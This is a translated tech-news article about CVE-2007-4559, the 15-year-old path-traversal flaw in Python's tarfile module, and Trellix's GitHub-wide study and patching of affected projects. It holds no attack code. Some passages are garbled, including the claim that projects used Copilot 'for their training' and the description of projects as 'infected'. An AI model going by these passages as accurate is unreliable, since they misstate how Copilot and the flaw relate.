A giant 15-year-old flaw has been found in Python. “Poisoned” hundreds of thousands of projects

22 September 2022 09:39
22 Sep 2022 09:39



There is a vulnerability in Python that crept into it back in 2007. It has been known for 15 years, but the developers have not fixed it, limiting themselves to a warning in the documentation. More than 350,000 open source projects have been affected. This is far from the first such case in the history of Python.

Python is not perfect

A flaw has been discovered in the Python programming language that has been hiding in it for at least 15 years. According to Bleeping Computer, due to the fact that it could not be eliminated for so long, it has penetrated several hundred thousand projects written in Python.

According to preliminary data, at least 350,000 open source repositories were affected. How many closed source programs contain this flaw remains to be seen.

The problem is exacerbated by the fact that Python is the most popular programming language in the world. Millions of programmers write on it.

Python developers have been unaware of “holes” in their projects for years

More questions are raised by the fact that the existence of a vulnerability was not a secret to anyone. It was identified at the end of August 2007, but not only was it not closed, but it was not even assigned a degree of danger. So far, all she has is just the fact of existence and the CVE-2007-4559 index.

The vulnerability is located in the Python tarfile package, in a piece of code that uses the untested tarfile.extract() or tarfile.extractall() functions. The flaw can be used to potentially overwrite and capture files on a victim’s computer when a vulnerable application opens a malicious tarball via tarfile.

Nobody does anything

For 15 years, Python developers represented by the Python Software Foundation have done absolutely nothing to protect users of programs in which the vulnerability is hidden. They also decided not to warn developers about the problem.

As a result, no one simply remembered CVE-2007-4559 for a decade and a half, which, of course, slightly reduced the risk of its exploitation by cybercriminals. The vulnerability resurfaced in early 2022 during the investigation of another Python-related security incident. However, even repeated coverage of the situation did not prompt the developers of the language to correct it.

Exploitation of CVE-2007-4559 vulnerability in Python

But I must say that after 15 years they still decided to respond. Now, thanks to their well-coordinated work, the Python documentation has a warning that “archives from untrusted sources can be dangerous.” Apparently, the developers consider their job done, as there was a notice in the Python bug tracking system that they were able to deal with CVE-2007-4559.

The scale is shocking

In 2022, the CVE-2007-4559 breach was identified by Trellix researchers. They were studying a very different problem in Python, but were curious about how dangerous their find was.

To determine the true extent of the disaster, the experts took 257 repositories, which, according to their assumptions, were most likely to contain vulnerable code. They manually checked 175 of them, and that was already enough – the “hole” was present in 61% of them.

At the second stage, a manual check of the remaining repositories was launched. As a result, the total number of projects containing CVE-2007-4559 increased to 65%.

Anton Smirnov, AI Cloud: AI magic begins where servers are combined into “teams”

Artificial intelligence

Later, GitHub, an open source repository storage service owned by Microsoft, joined the study of the security incident. “With the help of GitHub, we were able to obtain a much larger dataset, including 588,840 unique repositories that include import tarfil in their Python code,” Trellix said.

In total, according to experts, at least 350 thousand projects on GitHub turned out to be infected. The situation could be even worse, since many of these projects used the GitHub CoPilot service for their training, which helps novice programmers write code. This means that CVE-2007-4559 may actually be contained in a much larger number of projects.

CoPilot caught red-handed. He invites programmers to use dangerous code

In addition to drawing attention to the vulnerability and its associated risk, Trellix experts have also prepared fixes for just over 11,000 projects on GitHub. Fixes will be available in a branch of the affected repositories. Later they will be added to the main project via pull requests.

Researchers believe that more than 70 thousand projects will receive a fix in the next few weeks. Reaching 100% is not an easy task, as maintainers must also accept merge requests.

Familiar situation

The Python Software Foundation doesn’t seem to be always in a hurry to patch dangerous vulnerabilities. The situation with CVE-2007-4559 is far from a precedent.

Ascon switched from Cisco Webex to domestic meeting service

Import substitution VKS

For example, almost six years ago, at the very beginning of 2017, information was widely disseminated about “holes” in Python libraries that made it possible to establish connections bypassing firewalls and perform a number of different attacks. The problem was incorrect command syntax checking on established FTP connections, which allowed arbitrary commands to be injected.

Remarkably, the Python developers were notified about them by third-party experts as early as 2016, but were slow to fix them. And only wide publicity forced them to prepare the necessary patches.

Evgeny Cherkesov

The article is in Russian

Tags: giant #15yearold flaw Python Poisoned hundreds thousands projects

PREV The astronomer explained which asteroids could be potentially dangerous for the Earth
NEXT Ryzen 9 7950X liquid cooled faster than Core i9-12900KS and Ryzen 9 5950X liquid nitrogen